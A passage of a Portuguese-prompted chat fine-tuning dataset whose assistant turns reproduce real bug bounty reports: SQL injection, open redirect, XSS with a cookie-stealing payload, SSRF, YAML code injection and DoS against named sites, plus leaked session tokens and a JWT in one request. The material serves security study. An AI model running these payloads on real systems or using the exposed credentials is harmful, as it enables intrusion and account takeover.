Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Async search stores authorization headers in clear text"}, {"role": "assistant", "content": "### Passos para Reproduzir\n```\n# This just triggers an async-search as yourself.\nPOST /_async_search?size=0&wait_for_completion_timeout=0\n{\n \"query\": {\n \"match_all\": {}\n }\n}\n\n# This shows where the clear text authorization header is stored\nPOST /.async-search/_search\n{\n \"_source\": \"headers.*\"\n}\n```\n\n### Impacto\n- Super users can get the clear text credentials of other users.\n- An XSS with a superuser victim can now trivially get the authorization headers of its target."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: HTTP2 'unknownProtocol' cause Denial of Service by resource exhaustion"}, {"role": "assistant", "content": "### Passos para Reproduzir\nThe following steps assume you are on a linux system. Everything will run on your host system. The IP in the client is hard-coded to `127.0.0.1` and the port is `50000`. The scripts are kept as simple as possible. \n\n1. Create a file `client.sh` with the content provided in the Supporting Material section below (don't start it now)\n2. Create the Javascript file (see Supporting Material section below) and run the example server (may you want to customize the port). 
You can also start a non-secure server using `createServer()` if you don't have an example key or cert around.\n3. You query the file descriptors with the command provided in the Supporting Material section below. Simply replace `{PID}` with the process id of your node server.\n4. Maybe you also want to watch the memory consumption with the tool you prefer.\n5. Now you are ready to start the client script.\n\nWe initially found this issue by running the Greenbone Vulnerability Manager on our server port with the **OvenVAS default** scanner, the **Fast and ultimate** configuration with all kind of vulnerability tests enabled and the **TCP-SYN Service Ping** alive check.\n\nThe affected code that causes this issue seems to be [here](https://github.com/nodejs/node/blob/c0ac692ba786f235f9a4938f52eede751a6a73c9/lib/internal/http2/core.js#L2918-L2929).\n\nWe are running on Linux x86 with kernel v4.19.148 with node v12.19.0.\n\n### Impacto\n:\nAny code that relies on the http2 server is affected by this behaviour. For example the JavaScript implementation of GRPC also uses a http2 server under the hood.\n\nThis attack has very low complexity and can easily trigger a DOS on an unprotected server.\n\nThe above server example consumes about 6MB memory after start-up. Running the described attack causes a memory consumption of more than 400MB in approximately 30s and holding more than 7000 file descriptors. Both, the file descriptors and the memory, are never freed."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. 
Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: [intensedebate.com] SQL Injection Time Based On /js/commentAction/"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nHello,\n\nI have found a SQLI Injection Time Based on `/js/commentAction/`.\n\nWhen a user want to submit/reply to a comment, a JSON payload was send by a GET request.\n\n\n```GET /js/commentAction/?data={\"request_type\":\"0\",+\"params\":+{+\"firstCall\":true,+\"src\":0,+\"blogpostid\":504704482,+\"acctid\":\"251219\",+\"parentid\":\"0\",+\"depth\":\"0\",+\"type\":\"1\",+\"token\":\"7D0GVbxG10j8hndedjhegHsnfDrcv0Yh\",+\"anonName\":\"\",+\"anonEmail\":\"X\",+\"anonURL\":\"\",+\"userid\":\"26745290\",+\"token\":\"7D0GVbxG10j8hndedjhegHsnfDrcv0Yh\",+\"mblid\":\"1\",+\"tweetThis\":\"F\",+\"subscribeThis\":\"1\",+\"comment\":\"w\"}} HTTP/1.1\nHost: www.intensedebate.com```\n\nThe key `\"acctid\":\"251219\"` is vulnerable to SQL Injection Time based\n\n### Impacto\nFull database access holding private user information."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: CVE-2020-8285: FTP wildcard stack overflow"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nUser 'xnynx' on github filed [PR 6255](https://github.com/curl/curl/issues/6255) highlighting this problem. 
**Filed publicly**\n\nMy first gut reaction was that this had to be a problem with `curl_fnmatch` as that has caused us grief in the past (and on most platforms we use the native `fnmatch()` now, but not on Windows IIRC and this is a reported to happen on Windows), but I then built a test program and I made it crash in what seems like potential stack overflow due to recursive calls to `wc_statemach` from within itself.\n\n### Passos para Reproduzir\n1. build 6255.c (attached)\n 1. run it (with a debugger)\n 1. inspect the crash\n\nThe example app lists a directory with 40,000 files on funet.fi.\n\n### Impacto\nI haven't yet worked out exactly how to get what into the stack and what the worst kind of exploit of this might be, but a stack overflow that can be triggered by adding/crafting files in the server feels bad."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: SQL Injection Union Based"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nHello, \n\nI have found a SQL Injection Union Based on `https://intensedebate.com/commenthistory/$YourSiteId `\nThe `$YourSiteId` into the url is vulnerable to SQL Injection.\n\n### Impacto\nFull database access holding private user information and Reflected Cross-Site-Scripting"}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. 
Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: No rate limiting - Create data"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nHello team Stripo, how are you?\n\nI found a rate limit for data creation.\n\nTarget = https://my.stripo.email/cabinet/#/my-services/298427?tab=data-sources\n\nRequest to Post:\n\n```\nPOST /emailformdata/v1/amp-lists?projectId= HTTP/1.1\nHost: my.stripo.email\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0\nAccept: application/json, text/plain, */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/json;charset=UTF-8\nCache-Control: no-cache\nPragma: no-cache\nExpires: Sat, 01 Jan 2000 00:00:00 GMT\nX-XSRF-TOKEN: 3ef1a2b8-f640-457b-bac8-1d629d0f9498\nContent-Length: 198\nOrigin: https://my.stripo.email\nConnection: close\nReferer: https://my.stripo.email/cabinet/\nCookie: amplitude_id_246810a6e954a53a140e3232aac8f1a9stripo.email=eyJkZXZpY2VJZCI6ImU1NjAwZjk3LTFiY2QtNDIzOS1iZTczLWNmNWVhYmMzMTJkZFIiLCJ1c2VySWQiOm51bGwsIm9wdE91dCI6ZmFsc2UsInNlc3Npb25JZCI6MTYwNjc0NjU3NzcwMCwibGFzdEV2ZW50VGltZSI6MTYwNjc0Njg1ODg3OCwiZXZlbnRJZCI6MCwiaWRlbnRpZnlJZCI6MCwic2VxdWVuY2VOdW1iZXIiOjB9; _pin_unauth=dWlkPU1UUTFZemczWlRFdE1HSXdOeTAwT1Rrd0xUbGxNVEl0TWpBeE16WmpZVE00WlRZNA; _ga=GA1.2.730792257.1605012362; _pin_unauth=dWlkPU1UUTFZemczWlRFdE1HSXdOeTAwT1Rrd0xUbGxNVEl0TWpBeE16WmpZVE00WlRZNA; G_ENABLED_IDPS=google; __stripe_mid=e5538cc4-3896-4b96-b703-711ef38535d3313b41; _ga=GA1.3.730792257.1605012362; _gid=GA1.2.1102057235.1606746578; __stripe_sid=fcbc15d6-fe33-41ca-bd12-ad2a6fd80eb5a7fc3c; 
token=eyJhbGciOiJSUzUxMiJ9.eyJhdXRoX3Rva2VuIjoie1widXNlckluZm9cIjp7XCJpZFwiOjI5NDA3NyxcImVtYWlsXCI6XCJqYWFhaGJvdW50eUBnbWFpbC5jb21cIixcImxvY2FsZUtleVwiOlwicHRcIixcImZpcnN0TmFtZVwiOlwic2NyaXB0XCIsXCJsYXN0TmFtZVwiOlwiYm91bnR5XCIsXCJmYWNlYm9va0lkXCI6bnVsbCxcIm5hbWVcIjpudWxsLFwicGhvbmVzXCI6W10sXCJhY3RpdmVcIjp0cnVlLFwiZ3VpZFwiOm51bGwsXCJhY3RpdmVQcm9qZWN0SWRcIjoyOTg0MjcsXCJzdXBlclVzZXJWMlwiOmZhbHNlLFwiZ2FJZFwiOlwiY2JlOWMzMjItMDNhNS00NzQxLTlkMjYtNTc3MTc1MGI0M2MwXCIsXCJvcmdhbml6YXRpb25JZFwiOjI5MzgxNCxcIm93bmVkUHJvamVjdHNcIjpbMjk4NDI3XSxcImZ1bGxOYW1lXCI6XCJzY3JpcHQgYm91bnR5XCJ9LFwiaXNzdWVkQXRcIjoxNjA2NzQ2NjIwODUxLFwiYXBpS2V5XCI6bnVsbCxcInByb2plY3RJZFwiOm51bGwsXCJ4c3JmVG9rZW5cIjpcIjNlZjFhMmI4LWY2NDAtNDU3Yi1iYWM4LTFkNjI5ZDBmOTQ5OFwiLFwicm9sZVwiOlwiQ0FCSU5FVF9VU0VSXCIsXCJhdXRob3JpdGllc1wiOltdfSIsImV4cCI6MTYwNjgzMzAyMH0.qRAbnSN-DZWyUTUezJREviXpSgK1o_8U-3Rgt0xioXjID4apoWkfmPjt0vSnMcTRiF3oNLZmLC2FqnnMlMqqZb_v1Pv9Dn_gHSWOAF2s9IHn0tfJVPPh0BMTxDYfcFlvfMnGz9DMx7v4ETv7PJcSUwDBlFCMXcQ-kEa0AcSjOj7edpMJ2T18Xje3MgLx0Iq_u44HhYWxMaclL8FisL6Dqa13hQKijlCiV-H_jJSxEGpHgtUE0RPBI7kmWSMdW6flncHdf43S7An15uNxe6Dq6dbkuP3wpO_nO6IwNJLcxnt6s9_-ETCHXZIjMuNTKTs5zi0GoOA1OJ_8A1kCkN2cGal5ghD3fKpC4Slk5HkriZCHSvGf7tBgWJY7JCWCNMvucuKsUAeDjucFxB-wscr7iX6q6huJpCsa8gNNL_qR6PzwYF1kHuBRPTHCtF_PEcuqnc6LGfe9mCe6khdfGDKELGoTg8FtjZ-ce84oIhNLOSajzkJ3pbQ2vXB8B3Sm4lkjU85RzTMYhrNAF0zz6ZOzYqShg-QG60Yr66i07OcUXbw66R0ZH8YmH-ildoRtoJKNyloEuVMi-mz-KYZcRda1GHdBX-iEMto3ZXW7YL08DjdM9y07f0GnsSY_lBr_--nq73PxFd415D1sduoKkTDoSzOYIGT3dBK2D2PXpxiUUTs; _gid=GA1.3.1102057235.1606746578; JSESSIONID=A774ECEC8E8D7FB9527BC02A723054F8; intercom-session-b1m243ec=VWpock85SEcyYnRMZlVJcms0N1VCelVvdXd5b0J6eTFEWFh1QWIrZUpzSUlwbW8yT2RpdnZJamRnM3JtL3QrNi0tSVpVekFtR0s5c3RYV29MOGg5OUpQdz09--5e28d4d448f59bec98135e9bf373ff2ad64ab50d; 
_gat_UA-96386569-1=1\n\n{\"projectId\":298427,\"name\":\"ukibxiv4daehs7wdnupej63kgbm1aq.burpcollaborator.net\",\"description\":\"ukibxiv4daehs7wdnupej63kgbm1aq.burpcollaborator.net\",\"url\":null,\"identifier\":null,\"sourceType\":\"JSON\"}\n```\nThanks @OFJAAAH\n\n### Impacto\nThe attacker can charge the application, creating massively."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Non-revoked API Key Disclosure in a Disclosed API Key Disclosure Report on Stripo"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nCan you imagine discovering an API key disclosure vulnerability in a disclosed API key disclosure report? The same thing is what I came across while going through the disclosed reports at Stripo Inc. Plus, the disclosed API key isn't even revoked, and therefore I am still able to use the same API key to fetch response from the target.\n\nI am talking about #983331 where a security researcher reported secret API key leakage vulnerability in a JavaScript file at Stripo. This report is disclosed on HackerOne, and the team at Stripo have forgotten to blur the API keys from the report before disclosing it to the public. The API keys from Aviary and YouTube are disclosed in that report, and I tried using these API keys, and found out that they can still be used to fetch response from YouTube's API using Stripo's disclosed API key. 
I didn't check on Aviary though since I found out that Aviary is already a defunct image editor.\n\n### Passos para Reproduzir\n\n\n### Impacto\nBy taking an advantage of this vulnerability, an attacker would be able to use Stripo's YouTube API Key for calling different API endpoints in services provided in the YouTube Data API."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: PHP Info Exposing Secrets at https://radio.mtn.bj/info"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nDuring recon I discovered a PHP Info file exposing environment variables such as; Laravel APP_KEY, Database username/password, SMTP username/password, etc.\n\n### Passos para Reproduzir\nVisit the following URL;\n```\nhttps://radio.mtn.bj/info\n```\nYou will be presented with a PHP Info file exposing environment / PHP Variables.\n\n### Impacto\nExposing passwords to critical services.\nProviding application keys used for encryption/decryption within the app.\nSending email coming from an official email address."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. 
Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Abusing URL Parsers by long schema name"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nThere is known technique to exploit inconsistency of URL parser and URL requester logic to perform Server Side Request Forgery attack. Firstly it was presented by Orange Tsai at [A New Era Of SSRF Exploiting URL Parser](https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf). Firstly I found the familiar issue at old versions of curl, but exploit did not seems works at latest releases. But now I'm ready to share new exploit of issue.\n\n### Passos para Reproduzir\nSchema parser logic of curl library is vulnerable to \"Abusing URL Parsers\". Malicious user can use this weakness to bypass whitelist protection and perform Server Side Request Forgery against targets, that use vulnerable version of library.\n\n 1. curl \"ssrf3.twowaysyncapp.tk://google.com\" Protocol \"ssrf3.twowaysyncapp.tk\" not supported or disabled in libcurl\n 1. curl \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.twowaysyncapp.tk://google.com\" Host aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.twowaysyncapp.tk requested\n\n### Impacto\nIncorrect schema parser logic will allow malicious user to bypass protection mechanism and get access to the internal infrastructure of affected web servers."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. 
Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: [intensedebate.com] Open Redirect"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nI have found a Open Redirect on `https://intensedebate.com//fb-connect/logoutRedir.php?goto=`, the parameters `$_GET['goto']` is reflected to the HTTP-Header Response `Location`\n\nHTTP Request\n\n```\nGET /fb-connect/logoutRedir.php?goto=\\http://\\ HTTP/1.1\nHost: intensedebate.com\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:82.0) Gecko/20100101 Firefox/82.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3\nAccept-Encoding: gzip, deflate\nConnection: close\nCookie: y=y;\nUpgrade-Insecure-Requests: 1\n```\n\n\nHTTP Response\n\n```\nHTTP/1.1 302 Found\nServer: nginx\nDate: Thu, 03 Dec 2020 21:52:42 GMT\nContent-Type: text/html; charset=utf-8\nConnection: close\nP3P: CP=\"NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM\"\nSet-Cookie: fbName=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/\nSet-Cookie: fbUrl=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/\nSet-Cookie: fbPic=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/\nLocation: \\http://\\\nContent-Length: 0\n```\n\n### Impacto\nAn attacker can use this vulnerability to redirect users to other malicious websites, which can be used for phishing and similar attacks"}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. 
Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Bypass Tracking Blocker Protection Using Slashes Without Protocol On The Image Source."}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\n- Some Way Has Been Discovered To Bypass Image Rewriting On HeyMail Using Slashes Without Protocol `\\/\\www.evil.com` That Allows Bypassing Tracking Blocker And Collect Users Information Via Emails.\n\n### Impacto\nBypassing Image Rewriting Function Witch Allows Trackers To Collect Users IPs Using Images."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: [sub.wordpress.com] - XSS when adjust block Poll - Confirmation Message - On submission:Redirect to another webpage - Redirect address:[xss_payload]"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nDear Wordpress Team,\n\nToday when I tried to create a post with block \"Poll\" and I have found at Poll Block -> Confirmation Message -> On submission:Redirect to another webpage and Redirect address:[xss_payload]\n\nAt Redirect address line, I can save the ```javascript:alert(document.cookie)``` as an URL webpage after submit a poll. 
And when an authenticated wordpress user submitted a poll, their cookies may stolen by attacker\n\n### Passos para Reproduzir\n1- Logged in your wordpress website and create a post with block Poll, fill question and some choices\n\n{F1104221}\n 2- Adjust Poll Block, Confirmation Message -> On submission:Redirect to another webpage and Redirect address:javascript:alert(document.cookie) then click Update/Publish your post\n\n{F1104220}\n 3- Go to your created poll and Submit, you will see xss popup\n\n{F1104222}\n\nYou can see video PoC below for the steps:\n{F1104231}\n\n### Impacto\nSteal cookies"}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Code Injection via Insecure Yaml.load"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nThe Kubernetes repo and tool, [test-infra](https://github.com/kubernetes/test-infra), uses the insecure yaml.load() function to set or update the `Gubernator` configuration with a yaml file which allows for code injection.\nVulnerable Line of Code:\n[https://github.com/kubernetes/test-infra/blob/master/gubernator/main.py#L36](https://github.com/kubernetes/test-infra/blob/master/gubernator/main.py#L36)\n[https://github.com/kubernetes/test-infra/blob/master/gubernator/update_config.py#L35](https://github.com/kubernetes/test-infra/blob/master/gubernator/update_config.py#L35)\n[https://github.com/kubernetes/test-infra/blob/master/gubernator/update_config.py#L48](https://github.com/kubernetes/test-infra/blob/master/gubernator/update_config.py#L48) \nVulnerable Files and functions: main.py:get_app_config()\n 
update_config.py:main()\n\n### Passos para Reproduzir\n1. Install the `Gubernator` frontend.\n 2. save the provided `config.yaml` file as the configuration file for Guberator, keep the same name.\n 3. Once you update the configuration the poc should be executed and a `ls` should be executed. \n\nTo Facilitate the process I have created a poc.py script in which I extracted the vulnerable code blocks from the test-infra repository to simulate the tools behaviour (Only from the main.py to illustrate the concept, same applies to the other occurence).\n\n### Impacto\nAn attacker can exploit this vulnerability by crafting a malicious YAML file in order to execute system commands. An attacker can either find a way to load a malicious configuration file or entice a victim into loading it. This results in Command Execution.\nFor this reason I have marked the `User Interaction` of the CVSS score as required."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. 
Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: [intensedebate.com] No Rate Limit On The report Functionality Lead To Delete Any Comment When it is enabled"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nI have found a no rate limit issue on the report functionality.\nWhen you enabled the report functionality on your site, you can set a number of reports before deleting the comment reported.\nBy default, this functionality is unable, but if you enabled this and you set a $x number of reports before deleting the comment, an attacker can spamming this functionality and delete your comment.\n\n### Passos para Reproduzir\n1) Login at `https://intensedebate.com`\n2) Create your own site at `https://intensedebate.com/install`, and follow the instructions (use generic install)\n3) After setup your site, go to `https://www.intensedebate.com/user-dashboard`, on click to `Moderate`.\n\n {F1106120}\n\n4) Go to the comment setting by clicking to `Comments`\n\n{F1106122}\n\n5) Setup the Report functionality by checked the `Enable \"Report this comment\" button` and set a number of reports before deleting the comment to `10` and save it\n\n{F1106130}\n\n6) Go to your site and add a comment\n7) With a other account go to your site, and report the comment manually x10 \n8) After spam the Report functionality\n9) Refresh the page, and you will see the comment is deleted\n\n### Impacto\nDelete any comment in any site when the report functionality is enabled"}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. 
Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Stored XSS in wordpress.com"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nHello Team,\nI found the Stored XSS vulnerability in the Custom Style section, this vulnerability can result in an attacker to execute arbitrary JavaScript in the context of the attacked website and the attacked user. This can be abused to steal session cookies, performing requests in the name of the victim or for phishing attacks, by inviting the victim to become part of the manager or administrator.\n\n### Passos para Reproduzir\n1. As an attacker, go to the feedback section, then go to the Polling section.\n2. Add a new post or edit an existing post.\n3. Scroll down, click All Styles.\n4. Add a new Style.\n5. Named the temporary style, click Save Style.\n6. Change the Style Name with